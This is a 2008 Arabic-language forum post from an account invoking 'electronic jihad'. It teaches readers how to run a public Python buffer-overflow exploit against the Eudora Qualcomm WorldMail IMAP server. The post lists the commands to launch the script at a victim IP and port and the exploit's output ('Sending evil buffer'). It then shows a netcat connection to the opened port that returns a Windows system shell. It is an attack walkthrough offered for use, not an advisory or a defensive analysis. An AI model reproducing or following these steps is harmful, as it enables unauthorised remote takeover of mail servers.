Members Login
Username 
 
Password 
    Remember Me  
Post Info TOPIC: التعامل مع ثغرات لغه البايثون


سريه سفيان بن عوف الغامدي للجهاد الكتروني

Status: Offline
Posts: 632
Date:
التعامل مع ثغرات لغه البايثون
Permalink   
 


سلام
Python هي لغة عادة تستخدم في تطوير السوفت وير ولغة تستخدم بكثره
نطبق الشرح على ثغرة
Eudora Qualcomm WorldMail
ذي ثغرة موجودة في برنامج Eudora
البرنامج يستخدم في طبيقات الايميلات
طيب كيف الحين نستثمر الثغره
انسخ الكود التالي
Eudora Qualcomm WorldMail
وحطه في المفكره واحفظه بامتداد py مثال eudora.py
حمل برنامج Python
كلك يمين وحفظ باسم
تنصيب البرنامج سهل مايحتاج شرح <<<<<<<<< الذمة على Next biggrin.gif
بعد التنصيب راح يتكود مجلد في الدرايف C باسم Python24
اوكيه الحين نجي لتطبيق الثغرة :-
لنفرض انك حفظت eudora.py في المسار التالي


كود PHP:


C:********s and Settingsv1per-haCker areaDesktophaCking_laBexploitRemote 

روح على ابدا -----> تشغيل------> cmd
راح تفتح شاشة الدوس Doc واكتب الامر


كود PHP:


cd C:********s and Settingsv1per-haCker areaDesktophaCking_laBexploitRemote 

الان طبق الامر التالي لتطبيق الاكسبلوت


كود PHP:


eudora.py 

راح يجيك طريقة الاستثمار كالتالي


كود PHP:


C:********s and Settingsv1per-haCker areaDesktophaCking_laBexploitRemote>eudora.py
Eudora Qualcomm WorldMail 3.0 IMAPd Service 6.1.19.0Overflow
.
Discovered by  Tim Shelton security-advisories@acs-inc.
com
Coded by mati
@see-security.
com
Usage
eudora-imap-LIST.py <ip> <port


لنفرض ان الثغرة موجوده على الاي بي 192.168.1.162 <<<< ماخذه من الاكسبلويت tongue.gif
ونفرض البورت 4444 رايح يكون التطبيق كالتالي


كود PHP:


eudora.py 192.168.1.162 4444 

اذا كانت المخرجات كالتالي


كود PHP:


Discovered by  Tim Shelton security-advisories@acs-inc.com
Coded by mati
@see-security.
com
[+] 
Connecting
[+] * 
OK  WorldMail IMAP4 Server 6.1.19.0 ready
[+] Look Maa No authentication
!
[+] 
Sending evil buffer
...
[+] 
Done
[+] Connect to port 4444 on victim IP Muhahaha


اتصل عن طريق NetCat على البورت 4444


كود PHP:


nc -vn 192.168.1.162 4444 

المخرجات كالتالي


كود PHP:


(UNKNOWN) [192.168.1.1624444 (krb524open
Microsoft Windows 2000 
[Version 5.00.2195
]
(
CCopyright 1985-2000 Microsoft Corp
.
C:WINNTsystem32



-- Edited by so9or at 20:43, 2008-11-06

__________________
Page 1 of 1  sorted by
 Add/remove tags to this thread
Quick Reply

Please log in to post quick replies.

Tweet this page Post to Digg Post to Del.icio.us


Create your own FREE Forum
Report Abuse
Powered by ActiveBoard